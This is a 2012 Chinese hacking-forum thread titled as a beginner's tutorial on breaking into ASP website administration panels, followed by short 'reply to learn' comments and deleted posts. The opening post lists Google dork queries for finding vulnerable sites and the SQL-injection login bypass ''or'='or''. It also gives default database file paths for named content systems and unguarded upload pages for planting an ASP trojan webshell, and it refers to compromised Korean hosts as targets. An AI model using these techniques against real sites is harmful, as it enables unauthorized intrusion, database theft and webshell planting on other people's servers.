【新手教程】asp后台渗透的方法

honker08 · 发表于 2012-5-28 21:09:44

1、到Google搜索，site:cq.cn inurl:asp
2、到Google，搜索一些关键字，edit.asp? 韩国肉鸡为多，多数为MSSQL数据库!
3、利用挖掘鸡和一个ASP木马：
文件名是login.asp
……
路径组是/manage/
关键词是went.asp
用’or’='or’来登陆
4、以下这个方法因为太多人做过，所以一些网站管理员对此都有防范之心了，成功率不高:
关键字：“Co Net MIB Ver 1.0网站后台管理系统”
帐号密码为 ‘or’='or’
5、动感购物系统，呵呵。想到了明小子：
inurl:help.asp登陆，如未注册成为会员!
upLoad_bm1.asp和upLoad_c1.asp这两个随便选个，一般管理员都忽视了这2漏洞。
6、默认数据库地址blogdata/acblog.asa
关键字：acblog
7、百度 /htdocs
注册里可以直接上传asa文件！
8、/Database/#newasp.mdb
关键词：NewAsp SiteManageSystem Version

游客，如果您要查看本帖隐藏内容请回复

say_520 · 发表于 2012-5-28 22:45:04

啥东西…还隐藏

say_520 · 发表于 2012-5-28 22:45:10

啥东西…还隐藏

显示全部楼层 · 发表于 2012-5-28 23:04:09

提示: 作者被禁止或删除内容自动屏蔽

显示全部楼层 · 发表于 2012-5-28 23:08:08

提示: 作者被禁止或删除内容自动屏蔽

qjf541502724 · 发表于 2012-5-29 02:09:44

呵呵看看撒

sickles · 发表于 2012-5-29 09:28:22

回复学习ing

jianao0811 · 发表于 2012-5-29 17:34:01

.....都要恢回复.....

cl476874045 · 发表于 2012-5-29 18:51:11

XUEXI XIA

-冰凌_ · 发表于 2012-5-29 22:33:49

看看技术更新没

kenny 该用户已被删除	发表于 2012-5-28 23:04:09 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
kenny 该用户已被删除
	回复支持反对使用道具举报

kenny 该用户已被删除	发表于 2012-5-28 23:08:08 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
kenny 该用户已被删除
	回复支持反对使用道具举报

【新手教程】asp后台渗透的方法

点评

点评

指导单位

旗下站点

联系我们